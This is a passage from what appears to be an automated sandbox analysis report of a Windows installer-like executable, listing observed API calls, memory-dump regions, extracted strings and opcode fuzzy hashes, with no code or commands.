                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AttributesFileH_prolog3
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 1973727094-1835203436
                                                                                                                                                                          • Opcode ID: 8bd96244f557586867916141312f895101df79f898f9db972c8c365f0ac0fb61
                                                                                                                                                                          • Instruction ID: bf6b0650f1971f6da1f9d1eda793b6f6164147faaa5151e5c8cb91943a94dc57
                                                                                                                                                                          • Opcode Fuzzy Hash: 8bd96244f557586867916141312f895101df79f898f9db972c8c365f0ac0fb61
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F018FB1500204EBCB00AFB6C89159D3BA8AF04358F90C02FFC0D9F252EB39C649CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 00421801
                                                                                                                                                                            • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 00440164
                                                                                                                                                                            • Part of subcall function 00440126: lstrcpyW.KERNEL32 ref: 0044016C
                                                                                                                                                                            • Part of subcall function 00440126: _malloc.LIBCMT ref: 00440186
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 00440197
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 004401C2
                                                                                                                                                                            • Part of subcall function 00440126: wsprintfW.USER32 ref: 00440214
                                                                                                                                                                            • Part of subcall function 00440126: _memset.LIBCMT ref: 0044022C
                                                                                                                                                                            • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D1D
                                                                                                                                                                            • Part of subcall function 00440CE4: lstrcpyW.KERNEL32 ref: 00440D27
                                                                                                                                                                            • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440D9C
                                                                                                                                                                            • Part of subcall function 00440CE4: _swscanf.LIBCMT ref: 00440DC5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memsetlstrcpy$_swscanf$_mallocwsprintf
                                                                                                                                                                          • String ID: 4.70.0.1300$WinInet.dll
                                                                                                                                                                          • API String ID: 3061408237-898075288
                                                                                                                                                                          • Opcode ID: f38763ddb3e1ce976c4a695da1c141b0e723f43aad1a6f07aa197f5cc03588d2
                                                                                                                                                                          • Instruction ID: 312feafbbcbf20ec70c1373c4c3f56f602fec0d6eeb8f3adc4a8253bad7f1718
                                                                                                                                                                          • Opcode Fuzzy Hash: f38763ddb3e1ce976c4a695da1c141b0e723f43aad1a6f07aa197f5cc03588d2
                                                                                                                                                                          • Instruction Fuzzy Hash: A7F036B1A0021466E724FB659D46AABB3FCAF85714B00016FF605E2141DA78A945C659
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 00436F28
                                                                                                                                                                            • Part of subcall function 0040D2E5: __EH_prolog3_GS.LIBCMT ref: 0040D2EC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3__memset
                                                                                                                                                                          • String ID: PackageName$Startup
                                                                                                                                                                          • API String ID: 3055368530-2142348390
                                                                                                                                                                          • Opcode ID: 5fca3612233a80bb4fd0585f95ae28f403ab3ba5bdbcd9c3b05c01a0503ceff3
                                                                                                                                                                          • Instruction ID: cb750c5c1d958627db46bfb27559e58efe265efda4aa7aee821367da491d5a28
                                                                                                                                                                          • Opcode Fuzzy Hash: 5fca3612233a80bb4fd0585f95ae28f403ab3ba5bdbcd9c3b05c01a0503ceff3
                                                                                                                                                                          • Instruction Fuzzy Hash: 79F0BBB1A4021867D710EB649D02FAA73E4BB04708F1144EEA549E21C1EE74AE4C8788
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,RunISMSISetup), ref: 00419A87
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A91
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                          • String ID: RunISMSISetup
                                                                                                                                                                          • API String ID: 199729137-1536503584
                                                                                                                                                                          • Opcode ID: fca6e34a19414953b74debe2c82003569f09f1067c46dafb230f63a4522da641
                                                                                                                                                                          • Instruction ID: 6b78ee87499e38da932e5b5ee7483f9607b0971f957267291103f4cd21d358e2
                                                                                                                                                                          • Opcode Fuzzy Hash: fca6e34a19414953b74debe2c82003569f09f1067c46dafb230f63a4522da641
                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0E5705207109FD7149B30ED196A337AAFF41346B10403EE41681214D735EC89865C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• ___initconout.LIBCMT ref: 004518A9
  • Part of subcall function 00453538: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004518AE,?,HsG,0044E560,?), ref: 0045354B
• WriteConsoleW.KERNEL32(FFFFFFFE,?,00000001,00000000,00000000,?,HsG,0044E560,?), ref: 004518CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ConsoleCreateFileWrite___initconout
• String ID: HsG
• API String ID: 3087715906-1835203436
• Opcode ID: ebd93220050d891039e2ab01d121d49cf598592bfcbe302c1ccd9cbb88394505
• Instruction ID: 8f6992f2cd5ec848d4ca428c5a3851c84b07f700f83527082690bf6c5ca429b6
• Opcode Fuzzy Hash: ebd93220050d891039e2ab01d121d49cf598592bfcbe302c1ccd9cbb88394505
• Instruction Fuzzy Hash: BEE0D8706001057BEB14EB65EC45FAA3359DB11369F904325F921C62E1EB74DE49C76C
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 004591F7
  • Part of subcall function 004587F5: __EH_prolog3.LIBCMT ref: 004587FC
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFreeLastString$H_prolog3H_prolog3_
• String ID: @I$dgJ
• API String ID: 428257936-2614766533
• Opcode ID: b90a407458e53d454dca949170bccf3423f2ef144753e77e0d9e8d168fd95fa4
• Instruction ID: 243421d86e82226731bcb0fb49dcb14082ef1e28c7ca4bfb1f8d00b9ba636d24
• Opcode Fuzzy Hash: b90a407458e53d454dca949170bccf3423f2ef144753e77e0d9e8d168fd95fa4
• Instruction Fuzzy Hash: 36F08C75400108EACB04FF91C842AEC3768AF40318F80C06EF905BB192EF786B09C76D
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3
• String ID: HsG$hsG
• API String ID: 431132790-148063137
• Opcode ID: c8a416219dacc0eafda0b30f578b03f1d20e85e9d48cb3106065e3792baaa745
• Instruction ID: bdb74a5aae53450c2d4f44e7c53a8178a30bd26c69f60c260d0ed3a908835368
• Opcode Fuzzy Hash: c8a416219dacc0eafda0b30f578b03f1d20e85e9d48cb3106065e3792baaa745
• Instruction Fuzzy Hash: 69E09AB0440700DBDB20AF4688053DDBAB0BB00725F90C22FF8685A281C3FC4A89DF88
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3
• String ID: HsG$hsG
• API String ID: 431132790-148063137
• Opcode ID: 262259611de623f0e38288dd1e8350a1b98cc6dc0495d3006a2c3e3ba63404da
• Instruction ID: f1e788d987efc9c7afb7e223d3f36c1880c8140cee2f95dfce3b04dc591a1b32
• Opcode Fuzzy Hash: 262259611de623f0e38288dd1e8350a1b98cc6dc0495d3006a2c3e3ba63404da
• Instruction Fuzzy Hash: C1E09AB0444700DBD720AF8589053CDBAB0BB00724F90C22FB8586A281D3FC4A48DF88
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3
• String ID: HsG$hsG
• API String ID: 431132790-148063137
• Opcode ID: 1caca8cee9c7b466fcb6e73b08c4efa546d345d9e48e33d480d0b6e219d15e99
• Instruction ID: 9b76f1fc0350861953124b232ffb6853d25edbe403442270c3504ab86b44f2d8
• Opcode Fuzzy Hash: 1caca8cee9c7b466fcb6e73b08c4efa546d345d9e48e33d480d0b6e219d15e99
• Instruction Fuzzy Hash: E3E0DFB0804700CBD320AF8584053CDB6B0AB00725F80C62FF8685A2C1C3FC4645CB8C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,?,0045E036,?,?,?), ref: 0045E057
• GetLastError.KERNEL32(?,?,0045E036,?,?,?), ref: 0045E061
• SetLastError.KERNEL32(00000000,?,?,0045E036,?,?,?), ref: 0045E0A3
• SetLastError.KERNEL32(00000000,?,?,0045E036,?,?,?), ref: 0045E0AD
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 885227e2a2ce5df3a6efb283c4f3950b074c47bf2e884b1446df2e0c793e740c
• Instruction ID: f32d3ce236b349faf2398f8fbd39c7e92af736883aa4b494114516278c8ad380
• Opcode Fuzzy Hash: 885227e2a2ce5df3a6efb283c4f3950b074c47bf2e884b1446df2e0c793e740c
• Instruction Fuzzy Hash: E9F096305007659BDB392F22C80C75E7B57EB10B17F11442BED09822E3CBFD9A8A965A
Uniqueness

Uniqueness Score: -1.00%